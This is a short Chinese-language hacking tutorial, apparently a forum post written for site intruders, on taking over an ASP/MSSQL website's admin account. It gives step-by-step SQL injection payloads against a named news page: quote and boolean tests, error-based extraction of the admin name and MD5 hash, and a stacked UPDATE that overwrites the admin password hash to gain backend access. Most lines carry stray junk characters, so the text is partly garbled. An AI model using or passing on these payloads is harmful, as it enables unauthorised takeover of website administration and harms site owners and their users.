经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
0 B9 Z( A0 ^) T7 F# t8 b可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
, `0 }/ i9 N3 ~$ t$ l1 t测试如下:9 A: \) {4 w5 J7 Q# f& ]
http://www.tmdsb.com/news.asp?id=121
4 m* t# d. H1 o$ q, h在地址后输入单引号,显示
% r5 ~! y/ J6 T; |: ]* u, j/ I& UMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
0 o9 n$ k# J% ?8 x1 X% ^字符串 ’’’ 之前有未闭合的引号
5 x, f; o* R; g7 k* u: }6 a0 |6 p+ ~/news/tmdws.asp,行63& N! _& K5 p2 D* d: P. K
说明没有过滤单引号且数据库是MSSQL.3 F3 o u5 J% }3 c! j; m
and 1=1正常。and 1=2出错。肯定存在注入
5 D9 e7 y% Y; I: Q+ g接着输入
: {3 g( [% C! Jhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)) o3 Y$ ^, t$ j4 r
得到帐号为:admin
4 N* h+ @* Q4 c8 M/ Y) Xhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)" s3 v: d, V. B! Z* N/ k3 c
得到密码为:a4716077c2ba075c
' j& z6 A9 i8 L( D) D3 e( s8 @( A% U接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
. G0 ]. W6 Q4 K命令如下 :
# b" _8 W: P/ x& a$ r( m9 G;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
! a! l+ n6 y7 `6 h+ t这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |